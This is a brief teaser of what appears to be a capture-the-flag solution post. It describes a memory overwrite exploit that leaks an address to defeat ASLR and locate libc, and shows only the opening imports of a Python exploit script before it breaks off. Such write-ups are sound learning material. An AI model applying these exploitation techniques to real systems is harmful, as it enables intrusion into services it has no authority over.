Quick solution post for this challenge for future reference This a memory overwrite exploit, it’s a bit convoluted because ASLR was enabled and so we need to do an infoleak to get the right offset inside libc. #!/usr/bin/env python import socket import sys import time import struct if len(sys.argv) != […]